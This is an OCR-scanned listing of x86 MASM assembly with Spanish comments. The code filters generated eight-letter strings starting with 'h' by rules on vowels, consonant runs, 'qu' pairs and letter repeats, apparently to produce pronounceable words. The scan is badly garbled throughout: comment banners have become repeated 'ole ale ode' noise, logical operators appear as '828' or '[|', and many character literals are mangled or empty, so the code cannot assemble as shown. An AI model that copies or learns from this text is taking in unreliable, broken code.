
;* es lo mismo menos la y 
k 


> 


od ole ale ode ole ale ode ole ale ode ole ale ode ole ale ode ole ale ode ole le ole ole le ole ole ale ode ole ale ole ole ode ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole 
> 


¡aoesiesieioe dice jotake que tiene claro que el segundo caracter es minuscula 


mov esi, offset buffer 
mov al, [esi+1] 


ifal lI= " a" 8282 al! Il "e " 8282 al l= " " 8282 al l= "o " 8282 al! hs "u " 8282 al! I- "y" 


jmp masl 
.endif 


OOOO ROI 
E 

k 

> 

;* comprobado que tanto en ingles como en español despues 


;* despues de q siempre va u 
«k 


> 


o ole le ode ole ale ode ole ale ode ole le ode ole ale ode ole ole ode ole le ode ole le ode ole le ode ole le ode ole ole ode ole ole ole ole ole ode ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole 
> 


AIR RR comprobamos la q y q 

1 byte ptr [esi+2]== "q" || byte ptr [esi+2]=="q" 
¡Ae Comprobamos la u y u 

.1f byte ptr [esi+3]!="u" £éz byte ptr [esi+3] !="u" 
jmp masl 

.endif 


alololosiasiololel* ademas, el tercer caracter ha de ser otra vocal 


mov al, byte ptr [esi+4] 


ifal! l=" a" £4 al! l=" a" £z8 al I=" e" K£é al! l=" e" 8£z4 al! l= "3 1" E£é8A 
al != ES 1" £é al != "”" o" £i% al ! l=" o" £24% al != "”" u" S£é al ! l="u "”" 

jmp masl 

.endif 

.endif 

if byte ptr [esi+3]== "q" || byte ptr [esi+3]=="q" 

1f byte ptr [esi+4]i= "u "u" 828 byte ptr [esi+4] !="u" 

jmp masl 

.endif 


asiaiosiosioesio* ademas, el tercer caracter ha de ser otra vocal 


mov al, byte ptr [esi+5] 


ifal! l=" a" £:4 al I=" a" é£z8 al I=" e" Ké al! l=" e" £i4 al! I= "3 1" EBAY 
al l= " " 8282 al! la "o " 8282 al l= "o " 8282 al! l=" u" 828 al! -" y" 

jmp masl 

.endif 

.endif 

1f byte ptr [esi+4]== "q" || byte ptr [esi+4]=="q" 

£ byte ptr [esie5]!="u "u” 8282 byte ptr [esi+5] != "u" 

jmp masl 


asiaiosiodioesio* ademas, el tercer caracter ha de ser otra vocal 
mov al, byte ptr [esi+6] 


ifal!l="a " 8:81 al l= " a" 8282 al != " e" 8281 al l= " e" 8281 al l= "a" LB LA 
al I= " " 8282 al! l= "o " 8282 al l= "o " 8282 al ! t=" u" 828 al ! Il" u" 


jmp masl 
.endif 


.endif 
.endif 


if byte ptr [esi+5]== "q" || byte ptr [esi+5]=="q" 
if byte ptr [esi+6]!="u" $8 byte ptr [esi+6] !="u" 


jmp masl 
.endif 
aaa ademas, el tercer caracter ha de ser otra vocal 


mov al, byte ptr [esi+7] 


fal l="a" Sub al l= "a" 8 al l="e" Saki al l="e" Kél al l="1" EBA 
al !="1" 88 al l="0" £K8 al l="0" 88 al l="u" Suól al l="u" 


jmp masl 
.endif 
.endif 


O OOOO ROI 
> 
dk 


> 


;* sí tenemos una hache las palabras deben estar compuestas 
3* como minimo de dos vocales y como maximo de cuatro 


3* de otro modo nos saldrían palabras sin sentido 
k 


> 


O OOOO ROI 
> 


¡eses vocales valía 1 cuando estaba el filtro de que la segunda letra debía ser vocal 
;* ahora debe valer O 


mov vocales, O 
mov esi, offset buffer 


mov ax, word ptr [esi] 


no¿"m 


¡fal =="a" | al =="e" || al == "1" | al=="0" || al=="u" || al=="y"A 
[| al=="a" [| al =="e" [| al an e [| al=="0" [| al=="y" [| al=="y" 
inc vocales 


.endif 
¡Sere Festo eliminado porque en ah esta la "h" 


fah == "a" | ah =="e" |] ah == "1" | ah=="0" | al=="u"A 

3 llah=="a" || ah =="e" || ah == "i" | ah=="0" || ah=="u" || ah=="y" || an=="y" 
; inc vocales 

;.endif 


mov ax, word ptr [esi+2] 


¡if al == "a" | al =="e" | al == "1" | al=="0" |] al=="u" 

| al=="a" | al =="e" || al == "1" || al=="0" || al=="u"|| al=="y" || al=="y" 
inc vocales 

.endif 

if ah == "a" | ah =="e" || ah == "i" | ah=="0" | al=="u" A 


[| ah=="a" [| ah =="e" [| ah == "mo" [| ah=="0" [| ah=="u"|| ah=="y" [| ah=="y" 
inc vocales 


.endif 


mov ax, word ptr [esi+4] 


if al == "a" | al =="e" || al == "1" | al=="0" | al=="u5n 

| al=="a" | al =="e" || al == "1" || al=="0" || al=="u"|| al=="y" || al=="y" 
inc vocales 

.endif 

if ah == "a" | ah =="e" || ah == "i" | ah=="0" | al=="u" 


[| ah=="a" [| ah =="e" [| ah == "mo" [| ah=="0" [| ah=="u"|| ah=="y" [| ah=="y" 
inc vocales 
.endif 


mov ax, word ptr [esi+6] 


¡if al == "a" | al =="e" || al == "1" | al=="0" | al=="u5n 

| al=="a" | al =="e" | al == "1" || al=="0" || al=="u"|| al=="y" || al=="y" 
inc vocales 

.endif 

if ah == "a" | ah =="e" | ah == "i" | ah=="0" | al=="u" 


[| ah=="a" [| ah =="e" [| ah E mn [| ah=="0" [| ah=="u"|| ah=="y" [| ah=="y" 
inc vocales 
.endif 


if vocales < 2 || vocales > 4 
jmp masl 


.endif 


od ole ale ode ole ale ode ole ale ode ole ale ode ole ale ole ole ale ode ole le ode ole ale ode ole ale ode ole le ode ole ode ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole 
> 


; tres consonantes seguidas es tonto ¿no? 
OOOO ORIÓN 
> 


; ho es necesario cargar en esi el offset de buffer ya lo hemos cargado 
; mov esi, offset buffer 


¡Reese la primera es una h, no? entonces consonantes ya vale 1 pero no lo necesitamos 
; comenzamos la comparación por esi+1 


mov ax, word ptr [esi+1] 
este sí comparamos vocales solo comparamos 10 veces 


.Ifah!="a" 828 ah!="e" 828 ah!="1" £8 ah!="0" £8 ah!="u" $28 ah!="a" 
Si ah!="e" $28 ah!="1" 828: ah!="0" £8 ah!="u" 
If all="a" 828 all="e" 8uól all="1" 828% all="0" £K8 all="u" $28 all= "a" 
Si8 all="e" 88 all= "1" 8uél all="0" £é all="u" 


; si llegamos aquí es que hay tres consonantes seguidas 
; la h primera lo que contiene ah y lo que contiene al 


jmp masl 


.endif 
.endif 


mov ax, word ptr [esi+1] 


; estamos en el segunod caracter y vamos a ver 2? 3* y 4? si son consonantes 


.Ifah!="a" 881 ah!="e" 828 ah!="1" £8 ah!="0" £8 ah!="u" $28 ah!="a" 
Si ah!= "e" $28 ah!="1" 828 ah!= "0" 88 ah!= "u" 


If all="a" 828 all="e" 86 all="1" 828% all="0" £ 8 all="u" $28 all= "a" 
Suél all="e" 8£8 e "" £8 dE "o" 8z8l all="u" 


; si llegamos aqui esque esi+1 y esi+2 son consonantes 
mov al, byte ptr [esi+3] 


If all="a" 828 all= "e" 88 all="1" 828% all="0" £8 all="u" $28 all= "a" 
Si8 all="e" 88 all= "1" 828 all= "0" £Ké all="u" 


jmp masl 
.endif 
.endif 
.endif 


mov ax, word ptr [esi+2] 
; estamos en el tercer caracter y vamos a ver 3? 4? y 5” si son consonantes 


Af ah!= "a " 8282 ah!= "e " 8282 ah!= " " 8282 ah!= "o " 8282 ah!= " u" 828 ah!= " any 
88 ah!= "e " 8282 ah!= " " 8282 ah!= "o " 8282 ah!= "ua " 


Af al!= "”" a" Sé al!= "e "”" Sé al!= “3 "”" Sé al!= "o "”" Sé al!= "u "”" Sé al!= "”" ari 
826 all= "e" £8z all="i" $c8r all="0" $eéz all= "u" 


; sI llegamos aqui esque esi4+2 y esi43 son consonantes 
mov al, byte ptr [esi+4] 


If all="a" 828 all= "e" 8uól all="1" 828% all="0" £K8 all="u" $28 all= "a" 
Si all="e" 88 all= "1" 8uél all= "0" £é all="u" 


jmp masl 
.endif 
.endif 
.endif 


mov ax, word ptr [esi+3] 
; estamos en el cuarto caracter y vamos a ver 4? 5* y 6? si son consonantes 


.Ifah!="a" 88 ah!="e" 828: ah!="1" £8 ah!="0" £8 ah!="u" $28 ah!="a" 
SuÉl e "e" Sib pe "" £8 dile "o" 8282 ale ty" 


If all="a" 828 all="e" 88 all="1" 828% all="0" £8 all="u" $28 all= "a" 
Si all="e" 86 all= "1" 828% all="0" £8 all="u" 


mov al, byte ptr [esi+5] 


If all="a" 828 all="e" Sul all="1" 828% all="0" £é all="u" $28 all= "a" 
Si all="e" 86 all= "1" Sul all= "0" £é all="u" 


jmp masl 
.endif 
.endif 
.endif 


mov ax, word ptr [esi+4] 
; estamos en el quinto caracter y vamos a ver 5* 6? y 7? si son consonantes 


.Ifah!="a" 8281 ah!="e" 8:86 ah!="1" £8 ah!="0" £8 ah!="u" $28 ah!="a" 


Si ah!= "e" $28 ah!="1" 828: ah!= "0" 86 ah!= "u" 


If all="a" 828 all= "e" 8u8l all="1" 828% all="0" 8 all="u" $28 all= "a" A 
Su8l all= "e" 882 ali= "" £8 alo" 'o" 8u8l all="u" 


mov al, byte ptr [esi+6] 


If all="a" 828 all= "e" 8uél all="1" 828% all="0" £K8 all="u" $28 all="a'A 
Si all="e" 86 all= "1" 8uél all="0" £8 all="u" 


jmp masl 
.endif 


.endif 
.endif 


mov ax, word ptr [esi+5] 


; estamos en el sexto caracter y vamos a ver 6? 7* y 8* si son consonantes 


Ifah!="a" £8 ah!="e" £4 ah!="1" 88 ah!="0" £8 ah!="u" 88 ah!="a"A 
Suél e "e" £é8 a "" Siél E "o" 8282 e ty" 


If all="a" 828 all= "e" Só all="1" 828% all="0" £é8 all="u" $28 all= "a" 
Si8 all="e" 86 all= "1" 82% all="0" £ 8 all="u" 
mov al, byte ptr [esi+7] 


If all="a" 828 all="e" 8uól all="1" 828% all="0" £K8 all="u" $28 all= "a" 
Si all="e" 88 all= "1" 8uél all="0" £é all="u" 


jmp masl 
.endif 


.endif 
.endif 


ole e e ole ole ole ole ode ole de A e ol ole ole ole ode ole ol o ole ole ole ole ole ole de le e ole ole ole ole e 
z fin consonantes 


od ole le ode ole ale ode ole ale ode ole ale ode ole ale ode ole ole ole ole le ode ole le ole ole ale ode ole le ole ole ole ole ole ole ode ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole 
> 


; tres vocales seguidas tambien es tonto ¿no? 
od ole le ode ole ale ode ole ale ode ole ale ode ole ale ode ole le ode ole le ode ole le ode ole ale ode ole ale ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole als ole 
> 


; ya lo tenemos en esi 

; mov esi, offset buffer 

mov ax, word ptr [esi+1] 

; estamos en el segunod caracter y vamos a ver 2? 3” y 4? si son vocales 


Af ah== "a" ll ah== "a" [| ah== "y" [| ah== "o" [| ah== "y" [| ah== " any 
[| ah== "a" [| ah== mo" ll ah== "o" [| ah== "y" 


Af al== "a" [| al== "a" [| al== 1 [| al== "o" [| al== " u" ll al== " a" V 
[| al== "a" [| al== mn [| al== "o" ll al== "y" 


; si llegamos aqui esque esi+1 y esi+2 son vocales 
mov al, byte ptr [esi+3] 


Af al== "a" [| al== "a" [| al== 3" [| al== "o" [| al== "y" ll al== " a" V 
[| al== "a" [| al== 130 [| al== "o" ll al== "y" 


jmp masl 
.endif 
.endif 
.endif 


mov ax, word ptr [esi+2] 


; estamos en el tercer caracter y vamos a ver 3* 4? y 5” si son vocales 


Af ah== " a" ll ah== "e " [| ah== 5 " [| ah== "o " [| ah== "u " [| ah== " any 
[| ah== "e " [| a "i " ll raE "o " [| a " u" 
Af al== " a" [| al== "e " [| al== "i " [| al== "o " [| al== " u" ll al== " a" V 
[| al== "e " [| al== " " [| al== "o " ll al== "u " 


; sI llegamos aqui esque esi4+2 y esi43 son vocales 
mov al, byte ptr [esi+4] 


Af al== " a" [| al== "e " [| al== "i " [| al== "o " [ al== " u" ll al== " a" MN 
[| al== "e " [| al== " " [| al== "o " [| al== "a " 


jmp masl 
.endif 


.endif 
.endif 


mov ax, word ptr [esi+3] 


; estamos en el cuarto caracter y vamos a ver 4? 5* y 6? si son vocales 


if ah== " a" ll ah== "e " [| ah== "i " [| ah== "o " [| ah== "u " [| ah== " any 
: [| ah== "e " [| a " " [| eE "o " [| E " y" 


Af al== " a" [| al== "e " [| al== "i " [| al== "o " [| al== " u" ll al== " a" MN 
[| al== "e " [| al== " " [| al== "o " [| al== "ua " 
mov al, byte ptr [esi+5] 


Af al== " a" [| al== "e " [| al== "i " [| al== "o " [| al== " u" ll al== " a" V 
[| al== "e " [| al== " " [| al== "o " [| al== "ua " 


jmp masl 
.endif 
.endif 
.endif 


mov ax, word ptr [esi+4] 


; estamos en el quinto caracter y vamos a ver 5* 6? y 7 si son vocales 


Af ah== " a" ll ah== "e " [| ah== "i " [| ah== "o " [| ah== "u " [| ah== " any 
[| ah== "e " [| ah== "i " ll ah== "o " [| ah== " u" 
Af al== " a" [| al== "e " [| al== "i " [| al== "o " [| al== " u" ll al== " a" V 
[| al== "e " [| al== " " [| al== "o " [| al== "ua " 


mov al, byte ptr [esi+6] 


Af al== " a" [| al== "e " [| al== "i " [| al== "o " [| al== " u" ll al== " a" V 
[| al== "e " [| al== " " [| al== "o " [| al== "ua " 


jmp masl 
.endif 
.endif 
.endif 


mov ax, word ptr [esi+5] 


; estamos en el sexto caracter y vamos a ver 6? 7” y 8? sí son vocales 


ifa E "a" ll ah== "a" [| ah== a [| ah== "o" [| ah== 
[| ah== "a" [| ah== ma ll ah== "o" [| ah== "y" 
ifa as "a" [| al== "a" [| al== "o [| al== "o" [| al== 
[| al== "a" [| al== qe [| al== "o" ll al== "y" 
mov al, byte ptr [esi+7] 
ifa == "a" [| al== "a" [| al== 1" [| al== "o" [| al== 
[| al== men [| al== mr [| al== "o" ll al== "y" 
jmp masl 
.endif 
.endif 
.endif 


"y" [| ah== Mana 
u" ll al== "a" V 
"y" ll al== "a" V 


ds ole ale ode ole ale ode ole ole ode ole ale ode ole ale ode ole ale ode ole ale ole ole ale ole ole ale ole ole ale ole ole ole ole ole ole ole ole ole ole ole ole ode als ole ole ole ole ole ole ole ole als ole ole als ole ole ale ole ole ale 
> 


; 
; no consentimos 3 b en las combinaciones 


> 


od ole le ode ole ale ode ole ale ole ole ale ole ole ale ode ole ale ode ole le ode ole le ode ole ale ode ole ale ole ole ole ole ole ole ole ole ole ode ole ole ode ole ole ole ole ole ole als ole ole ole ole ole als ole ole als ole ole le 
> 


mov bes, O 


mov ax, word ptr [esi+1] 
if ah=="b" || ah=="b" 
inc bes 

.endif 


Af a =="b" [| al=="b" 
inc bes 
.endif 


mov ax, word ptr [esi+3] 
ifa =="b" [ al =="b" 
inc bes 

.endif 


if a =="b" [| a =="b" 
inc bes 
.endif 


mov ax, word ptr [esi+5] 
ifa =="b" [| ah=="b" 
inc bes 

.endif 


if al=="b" || al=="b" 
inc bes 
.endif 


mov ah, byte ptr [esi+7] 
if ah=="b" |] ah=="b" 
inc bes 

.endif 


.1f bes >2 
jmp masl 
.endif 


ole eel olle ole ole ole ode ee ole ole ole ole ole ole ode ol ode ole ole ole ole ole ole oe ole ode ol e ole ole ole ole ole ole ode ole e ole ole ole ole oe ole ode ole e ole ole ole ole de ole de ole 
> 

; 

; no consentimos 3 c en las combinaciones 

; 


ds ole le ode ole ole ode ole ale ode ole ale ole ole ole ole ole ole ole ole ale ole ole ale ole ole ale ode ole ale ole ole ole ole als ole ode ole ole ole als ole ole ole ole ole als ole ode ole ole ole als ole ole als ole ole als ole ole le 
> 


mov ces, O 


mov ax, word ptr [esi+1] 
if ah=="c" || ah=="c" 
inc ces 

.endif 


no.” 


if al=="c" || al=="c 
inc ces 
.endif 


mov ax, word ptr [esi+3] 
if ah==" " [| ah==" " 
inc ces 

.endif 


no” no.” 


¡if al=="c" || al=="c 
inc ces 
.endif 


mov ax, word ptr [esi+5] 
if ah==" " [| ah==" " 
inc ces 

.endif 


no.” no.” 


if al=="c" || al=="c 
inc ces 
.endif 


mov ah, byte ptr [esi+7] 


ifah=="c" || ah=="c" 
inc ces 
.endif 
.1f ces >2 
jmp masl 
.endif 


ole ee ol ole ole ole ole ole ode e ole ole ole ole ode ole ode ol ode ole ole ole ole ode ole ode ole oe ole e ole ole ole ole e ole ode ole e ole ole ole ole oe ole oe ole e ole ole ole ole de ole od ole 
cd 

; 

; no consentimos 3 d en las combinaciones 


> 


ds ole le ode ole ale ode ole ale ole ole ale ode ole ale ole ole ale ode ole le ode ole le ode ole le ode als ale ole ole ode ole ole ole ode ole ole ole als ole ole als ole ole als ole ole ale ole ole als ole ole als ole ole als ole ole ale 
> 


mov des, O 


mov ax, word ptr [esi+1] 
if ah=="d" || ah=="d" 


inc des 
.endif 


¡if al=="d" || al=="d" 
inc des 
.endif 


mov ax, word ptr [esi+3] 
if ah=="d" || ah=="d" 
inc des 

.endif 


¡if al=="d" || al=="d" 
inc des 
.endif 


mov ax, word ptr [esi+5] 
if ah=="d" || ah=="d" 
inc des 

.endif 


¡if al=="d" || al=="d" 
inc des 
.endif 


mov ah, byte ptr [esi+7] 
if ah=="d" || ah=="d" 
inc des 

.endif 


If des >2 
jmp masl 
.endif 


od ole le ode ole ale ode ole le ode ole ale ode ole ale ode ole ale ole ole ale ode ole ale ode ole ale ole ole ale ole ole ole ole ole ole ole ole ole ole als ole ole ole ole ode als ole ole als ole ole als ole ole ale ole ole als ole ole ale 
> 

> 

; no consentimos 3 g en las combinaciones 

> 


ode ole le ode ole ale ode ole ale ole ole ale ode ole ale ole ole ale ole ole le ode ole ale ole ole ale ode ole ale ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole als ole ole als ole ole als ole ole als ole ole als ole ole ale 
> 


mov ges, O 


mov ax, word ptr [esi+1] 
Af ah=="g" [| ah=="g" 
inc ges 

.endif 


Af al=="g" [| al==" " 
inc ges 
.endif 


mov ax, word ptr [esi+3] 
Af ah=="g" [| ah==" " 
inc ges 

.endif 


Af al=="g" [| al=="g" 
inc ges 


.endif 


mov ax, word ptr [esi+5] 


A] 


Af ah=="g 
inc ges 
.endif 


[| ah=="g" 


A] 


Af al=="g 
inc ges 
.endif 


A] 


[| al=="g 


mov ah, byte ptr [esi+7] 
Af ah=="g" [| ah=="g" 
inc ges 


.endif 


.1f ges >2 
jmp masl 
.endif 


lee ole ol ole ole ole ode e ole ole ole ole ole ole ode de le ole ole ole ode ole oe ole ode ol e ole ole ole ole ode ole ode ole e ole ole ole ole oe ole oe ole e ole ole ole ole e ole e ole 
> 

; 

; no consentimos 3 h en las combinaciones 


> 


od ole lod ole ale ode ole ale ode ole ole ode ole ale ode ole ole ode ole ale ode ole le ole ole le ode ole le ole ole ole ole ole ole ole ole ole ole ole ole ole als ole ode ole ole ode ole ole ole ole ole ole ole ole ole als ole ole ale 
> 


; la primera es una hache asi que haches ya vale 1 
mov haches, 1 


mov ax, word ptr [esi+1] 
ifah=="h" || ah=="h" 
inc haches 

.endif 


¡if al=="h" || al=="h" 
inc haches 
.endif 


mov ax, word ptr [esi+3] 
if ah=="h" || ah=="h" 
inc haches 

.endif 


¡if al=="h" || al=="h" 
inc haches 
.endif 


mov ax, word ptr [esi+5] 
ifah=="h" || ah=="h" 
inc haches 

.endif 


¡if al=="h" || al=="h" 
inc haches 
.endif 


mov ah, byte ptr [esi+7] 
ifah=="h" || ah=="h" 
inc haches 

.endif 


.1£ haches>2 
jmp masl 
.endif 


lol ee ol ole ol ole ole ole ode e ole ole ole ole ole ole oe ol de ole ole ole ole ole ole ode ole ode ol e ole ole ole ole oe ole ode ol e ole ole ole ole oe ole ode ole e ole ole ole ole e ole de ole 
> 

; 

; no consentimos 3 z en las combinaciones 

; 


od ole le ode ole ole ode ole ole ode ole ale ode ole ale ode ole ale ole ole ale ole ole ale ode ole ale ole ole ale ode ole ode ole ole ole ole ole ole ode ole ole ole als ole ole ole ole ole ole ole ole ole ole ole als ole ole ale ole ole ale 
> 


mov cetas, O 


mov ax, word ptr [esi+1] 
ifab=="Z" | ah=="z" 
inc cetas 

.endif 


”_o" 


ifal=="Z" || al=="z 
inc cetas 
.endif 


mov ax, word ptr [esi+3] 
ifab=="z" | ah=="z" 
inc cetas 

.endif 


no" 


if al=="Z" || al=="z 
inc cetas 
.endif 


mov ax, word ptr [esi+5] 
Af ah==" " [| ah==" " 
inc cetas 

.endif 


n_n" no" 


ifal=="Z" || al=="z 
inc cetas 
.endif 


mov ah, byte ptr [esi+7] 
Af ah==" " [| ah==" " 
inc cetas 

.endif 


If cetas >2 
jmp masl 
.endif 


ds ole ale ode ole ole ode ole ale ode ole ale ode ole ole ode ole ale ole ole ale ode ole ale ole ole ale ode ole ale ole ole ole ole ole ole ode ole ole ole als ole ole als ole ole als ole ole als ole ole als ole ole als ole ole als ole ole ale 
> 

> 

; ho consentimos 2 j¡ en las combinaciones 

> 


od ole ale ode ole ale ode ole ale ole ole ale ode ole ole ode ole ale ode ole ale ode ole ale ode ole ale ode ole ale ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole als ode ole ale ole ole als ole ole als ole ole als ole ole ale 
> 


mov jotas, O 


mov ax, word ptr [esi+1] 
Af ah=="j" [| ah=="j" 

inc jotas 

.endif 


Af al=="j" [| al=="j" 
inc jotas 
.endif 


mov ax, word ptr [esi+3] 
Af ah=="j" [| ah=="j" 


inc jotas 
.endif 


mon 


if al=="3" || al=="j 
inc jotas 
.endif 


mov ax, word ptr [esi+5] 
Af ah=="j" [| ah=="j" 

inc jotas 

.endif 


Af al=="j" [| al=="j" 
inc jotas 
.endif 


mov ah, byte ptr [esi+7] 
Af ah=="j" [| ah=="j" 
inc jotas 

.endif 


If jotas >1 
jmp masl 
.endif 


lol ee ol ole ole ole ode ole ode ode ole ode ole ole ode ole ode ol oe ole ole ole ole ode ole ode ole ode ole e ole ole ole ole oe ole ode ole e ole ole ole ole oe ole ode ole e ole ole ole ole de ole ad ole 
> 

; 

; no consentimos 3 k en las combinaciones 

; 


o ole lod ole ale ode ole ale ode ole ale ode ole ale ode ole ale ode ole ale ole ole ale ode ole ale ode ole ale ode ole ode ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole als ole ole ole ole ole als ole ole ale ole ole ale 
> 


mov kas, O 


mov ax, word ptr [esi+1] 
ifah=="k" || ah=="k" 
inc kas 

.endif 


¡if al=="k" || al=="k" 
inc kas 
.endif 


mov ax, word ptr [esi+3] 
ifah=="k" || ah=="k" 
inc kas 

.endif 


¡if al=="k" || al=="k" 
inc kas 
.endif 


mov ax, word ptr [esi+5] 
if ah=="k" || ah=="k" 
inc kas 

.endif 


¡if al=="k" || al=="k" 
inc kas 
.endif 


mov ah, byte ptr [esi+7] 
if ah=="k" || ah=="k" 
inc kas 


.endif 


If kas >2 
jmp masl 
.endif 


ol lee ol ole ole ole ole ole ode oe ole ole ole ole ole ole ode ol ode ole ole ole ole ole ole ode ole de ol e ole ole ole ole ode ole de ole oe ole ole ole ole oe ole e ole e ole ole ole ole e ole de ole 
El 

; 

; no consentimos 3 m en las combinaciones 


> 


od ole le ode ole ale ode ole ole ode ole ole ode ole ale ode ole ale ode ole ale ode ole le ode ole ale ode ole le ode ole ole ole ole ole ole ole ole ole als ole ode ole ole ode ole ole ode ole ole ole ole ole ole als ole ole als ole ole le 
> 


mov emes, O 


mov ax, word ptr [esi+1] 
Af ah==" " [| ah==" " 


.endif 


if al==" " ll al==" " 
inc emes 
.endif 


mov ax, word ptr [esi+3] 
Af ah==" " [| ah==" " 


.endif 


if al==" " ll al==" " 
inc emes 
.endif 


mov ax, word ptr [esi+5] 
if ah==" " [| ah==" " 
inc emes 

.endif 


ifal=="m" || al=="m" 
inc emes 
.endif 


mov ah, byte ptr [esi+7] 
ifabh=="m" || ah=="m" 
inc emes 

.endif 


If emes >2 
jmp masl 
.endif 


lol e ol ode ol ole ode ole ode ode ole ole ole ole ole ole ole o ode ol ole ole ole ole ole oe ole ode ol e ole ole ole ole oe ole oe ole e ole ole ole ole oe ole e ole e ole ole ole ole de ole od ole 
> 

; 

; no consentimos 3 n en las combinaciones 


> 


od ole le ode ole ale ode ole ale ole ole ale ode ole ale ode ole ale ode ole le ole ole ale ode ole ale ode ole ale ode ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole als ole ole ole ole ole als ole ole ole ole ole als ole ole le 
> 


mov enes, O 


mov ax, word ptr [esi+1] 
if ah==" " [| ah==" " 
inc enes 

.endif 


if al=="n" || al=="n" 
inc enes 
.endif 


mov ax, word ptr [esi+3] 
ifab=="n" || ah=="n" 
inc enes 

.endif 


if al=="n" || al=="n" 
inc enes 
.endif 


mov ax, word ptr [esi+5] 
ifabh=="n" || ah=="n" 
inc enes 

.endif 


¡if al=="n" || al=="n" 
inc enes 
.endif 


mov ah, byte ptr [esi+7] 
ifabh=="n" || ah=="n" 
inc enes 

.endif 


If enes >2 
jmp masl 
.endif 


od ole ale ode ole ale ole ole ale ode ole ale ode ole ale ode ole ale ole ole ale ode ole ale ole ole ale ole ole le ole ole ole ole als ole ode ole ole ole ole ole ole ole ole ode ole ole ole ole ole ole als ole ole als ole ole als ole ole le 
> 

> 

; no consentimos 3 p en las combinaciones 

> 


lod ole ale ode ole ale ode ole ale ole ole ale ode ole ole ole ole ale ode ole le ole ole le ole ole ale ole ole ale ole ole ode ole als ole ole ole ole ole ole ole ole als ole ole ole ole ole ole ole ole ole ole ole als ole ole als ole ole ale 
> 


mov pes, O 


mov ax, word ptr [esi+1] 
Af ah=="p" [| ah=="p" 
inc pes 

.endif 


Af al=="p" [| al=="p" 
inc pes 
.endif 


mov ax, word ptr [esi+3] 
Af ah=="p" [| ah=="p" 
inc pes 

.endif 


Af al=="p" [| al=="p" 
inc pes 
.endif 


mov ax, word ptr [esi+5] 
Af ah=="p" [| ah=="p" 
inc pes 

.endif 


Af al=="p" [| al=="p" 


inc pes 
.endif 


mov ah, byte ptr [esi+7] 
Af ah=="p" [| ah=="p" 
inc pes 

.endif 


1f pes >2 
jmp masl 
.endif 


ole ole ole ole ole ole ode ode ole ole ole ole ole ole ole ol de ole ole ole ole ode ole oe ole ode le e ole ole ole ole ode ole ode ol e ole ole ole ole oe ole oe ole e ole ole ole ole de ole de ole 
El 

; 

; no consentimos 3 r en las combinaciones 

; 


ds ole le ode ole ale ode ole ale ode ole ole ode ole ale ode ole ale ode ole ale ode ole ale ode ole le ode ole ale ole ole ole ole ole ole ode ole ole ole ole ole ole als ole ole ole ole ole als ole ole ole ole ole als ole ole als ole ole ale 
> 


mov erres, O 


mov ax, word ptr [esi+1] 
ifab=="r" | ah=="r" 
inc erres 

.endif 


”_"” 


if al=="r" || al=="r 
inc erres 
.endif 


mov ax, word ptr [esi+3] 
ifab=="r" || ah=="r" 
inc erres 

.endif 


if al=="r" || al=="r" 
inc erres 
.endif 


mov ax, word ptr [esi+5] 
ifab=="r" || ah=="r" 
inc erres 

.endif 


if al=="r" || al=="r" 
inc erres 
.endif 


mov ah, byte ptr [esi+7] 
ifab=="r" || ah=="r" 
inc erres 

.endif 


Af erres >2 
jmp masl 
.endif 


ole ee ol ole ole ole ole ole ole ode ole ole ole ole ole ole ode ol de ole ole ole ole ode ole oe ole oe ole e ole ole ole ole ole ole ode ole e ole ole ole ole oe ole ode ole e ole ole ole ole e ole de ole 
El 

; 

; no consentimos 3 s en las combinaciones 

; 


od le le ode ole ole ode ole ale ode ole ale ode ole ale ode ole le ode ole le ode ole ale ode ole le ode ole ale ole ole ole ole ole ole ole ole ole ole ole ole ole als ole ode als ole ole als ole ole ole ole ole als ole ole als ole ole le 
> 


mov eses, O 


mov ax, word ptr [esi+1] 
Af ah== ="s " [| ah=="s" 
inc eses 

.endif 


Af al== ="s " ll al== ="s " 
inc eses 
.endif 


mov ax, word ptr [esi+3] 
Af ah== ="s " [| ah== ="s " 
inc eses 

.endif 


Af al== ="s " ll al== ="s " 
inc eses 
.endif 


mov ax, word ptr [esi+5] 
Af ah== ="s " [| ah== ="s " 
inc eses 

.endif 


="s " "e" 


if al= || al=="s 
inc eses 


.endif 


mov ah, ia BE [esi4+7] 
ifal |lah=="s" 
inc eses 

.endif 


="s " 


If eses >2 
jmp masl 
.endif 


lol ee ol ole ole ole ole ole ode ode ole ole ole ole ole ole ode ol de ole ole ole ole ole ole oe ole oe ole e ole ole ole ole oe ole de ole e ole ole ole ole oe ole oe ole e ole ole ole ole e ole de ole 
> 

; 

; no consentimos 3 t en las combinaciones 


> 


od ole le ode ole ale ode ole ale ole ole ale ode ole ale ode ole le ode ole le ode ole le ode ole le ode ole le ole ole ole ole ole ole ole ole ole ode ole ole ole als ole ole ole ole ole ole ole ole ole ole ole als ole ole als ole ole ale 
> 


mov tes, O 


mov ax, word ptr [esi+1] 
ifabh=="t" | ah=="t" 

inc tes 

.endif 


if al=="t" | al=="t" 
inc tes 
.endif 


mov ax, word ptr [esi+3] 
ifabh=="t" | an=="t" 

inc tes 

.endif 


if al=="t" | al=="t" 
inc tes 
.endif 


mov ax, word ptr [esi+5] 


Af ah=="t" [| ah==" " 
inc tes 
.endif 
Af al=="t" [| al==" " 
inc tes 
.endif 
mov ah, byte ptr [esi+7] 
Af ah=="t" [| ah==" " 
inc tes 
.endif 
If tes >2 
jmp masl 
.endif 


ole ole ol ole ole ole ode oe ole ole ole ole ode ole ole ol de ole ole ole ole ole ole ode ole oe ole e ole ole ole ole oe ole ode ole e ole ole ole ole oe ole oe ole e ole ole ole ole oe ole od ole 
> 

; 

; no consentimos 3 v en las combinaciones 


> 


ode ole le ode ole ale ode ole ale ode ole ale ole ole ale ole ole ale ode ole ale ode ole le ode ole le ode ole ale ode als ole ole ole ole ole ole ode ode als ole ole ole ole ole als ole ode ale ole ole ole ole ole als ole ole als ole ole ale 
> 


mov uves, O 


mov ax, word ptr [esi+1] 
ifah=="v" || ah=="v" 
inc uves 

.endif 


if al=="v" || al=="v" 
inc uves 
.endif 


